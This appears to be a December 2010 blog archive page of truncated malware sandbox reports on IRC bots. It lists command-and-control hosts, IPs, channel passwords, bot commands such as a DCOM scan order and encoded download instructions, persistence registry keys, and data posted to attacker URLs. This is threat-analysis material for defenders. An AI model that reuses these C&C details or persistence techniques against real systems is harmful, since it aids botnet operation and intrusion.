Month: December 2010

Remote Host Port Number 69.14.212.123 65267 PASS daloot JOIN #NzM# screwu USERHOST USA|00|XP|SP2|3342046 MODE USA|00|XP|SP2|3342046 -x+i PRIVMSG #NzM# : (patcher.p fixed, version 1. NICK USA|00|XP|SP2|3342046 USER pnlzszqe 0 0 :USA|00|XP|SP2|3342046 PONG :A2E3B7DC Now talking in #NzM# Topic On: [ #NzM# ] [ .root.start dcom135 200 0 0 109.x.x.x -a -b -r -s ] Topic By:Read more...

DNS Lookup Host Name IP Address beautybiz.no-ip.org 84.19.169.234 Outgoing connection to remote server: beautybiz.no-ip.org TCP port 80DNS Lookup Host Name IP Address 127.0.0.1 127.0.0.1 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “UserInit” = C:WINDOWSsystem32userinit.exe,C:Windupdtwinupdate.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “winupdater” = C:Windupdtwinupdate.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem “DisableRegistryTools” = [REG_DWORD, value: 00000001] HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall” = [REG_DWORD, value: 00000001] HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileRead more...

Resolved : [ush.nerashti.net] To [109.123.108.61] Resolved : [ush.nerashti.net] To [174.127.127.137] Resolved : [ush.nerashti.net] To [77.68.52.6] DNS Lookup Host Name IP Address ush.nerashti.net 77.68.52.6 C&C Server: 77.68.52.6:81 Server Password: Username: n Nickname: n|DEU|XP|DELL-D3E62F7E26|mmxwpcz Channel: #win# (Password: ) Channeltopic: :.im /99/106/112/81/55/59/40/125/111/122/35/104/108/44/39/100/113/109/110/59/106/120/102/9/83/106/112/124/99/123/124/36/112/107/113/31/60/117/96/71/109/105/110/103/107/112/46/57/37/59/38/42/23/8/65/72/83/ Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenS-3685-5437-5687winsrvn.exe” = C:Dokumente undRead more...

Remote Host Port Number 174.127.127.137 81 NICK n[USA|XP|COMPUTERNAME]xvfnrcj USER n “” “lol” :n JOIN #bul# PONG 422 PONG :request4.not.found Now talking in #bul# Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ] Topic By: [ n ] (abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ (RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]Read more...

Remote Host Port Number 137.215.75.246 6667 195.197.175.21 6667 NICK drugss ISON akon black bleed blood dead devil dr evil ghost hustler lord Lucifer mad ManaGer Master mIRC Mr Power sadness Scorpions system JOIN #Raps MODE #raps MODE mwahc +iwx MODE drugss +iwx SILENCE +*!*@* USER net “” “rap-yo-city.dyndns.org” : 6Get away ! NICK samerl USERRead more...

Remote Host Port Number 207.114.175.51 6667 NICK COMPUTERNAME16180 USER COMPUTERNAME16180 0 0 COMPUTERNAME16180COMPUTERNAME16180 JOIN #newaiuwhd NICK COMPUTERNAME79226 USER COMPUTERNAME79226 0 0 COMPUTERNAME79226COMPUTERNAME79226 NICK COMPUTERNAME61492 USER COMPUTERNAME61492 0 0 COMPUTERNAME61492COMPUTERNAME61492 * The following ports were open in the system: Port Protocol Process 1054 TCP 8jg53l4ojo74khk.exe (%Windir%8jg53l4ojo74khk.exe) 1056 TCP 8jg53l4ojo74khk.exe (%Windir%8jg53l4ojo74khk.exe) 1057 TCP 8jg53l4ojo74khk.exe (%Windir%8jg53l4ojo74khk.exe) Registry ModificationsRead more...

Remote Host Port Number 217.70.188.30 3211 92.243.28.194 3211 95.142.163.184 3211 95.142.168.229 3211 USER VirUs “” “lol” :9813 NICK [USA][XP-SP2]315437 USER VirUs “” “lol” :7634 NICK [USA][XP-SP2]900959 USER VirUs “” “lol” :4049 NICK [USA][XP-SP2]032172 NICK [USA][XP-SP2]456089 USER VirUs “” “lol” :1467 NICK [USA][XP-SP2]687424 USER VirUs “” “lol” :6389 NICK [USA][XP-SP2]442067 USER VirUs “” “lol” :7908 NICKRead more...

DNS Lookup Host Name IP Address xo39du910.t35.com 69.10.48.106 Data posted to URLs http://69.10.48.106/1/post.php (xo39du910.t35.com) Outgoing connection to remote server: xo39du910.t35.com TCP port 80 Registry Changes by all processes Create or Open Changes Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File” HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager” HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSessionRead more...

DNS Lookup Host Name IP Address 97.74.114.46 97.74.114.46 Download URLs http://97.74.114.46/css/style.gif (97.74.114.46) Outgoing connection to remote server: 97.74.114.46 TCP port 80 Registry Changes by all processes Create or Open Changes Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionFontSubstitutes “MS Shell Dlg 2” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File” HKEY_CURRENT_USERSoftwareMicrosoftCTF “DisableRead more...

Remote Host Port Number 207.210.96.152 6567 PASS s1m0n3t4 MODE [SI|USA|00|P|83827] -ix JOIN #carro# c1rc0dus0leil PONG Apple.Network NICK [SI|USA|00|P|83827] USER XP-2586 * 0 :COMPUTERNAME * The following port was open in the system: Port Protocol Process 1053 TCP conmysys.exe (%Windir%conmysys.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Service ares = “conmysys.exe”Read more...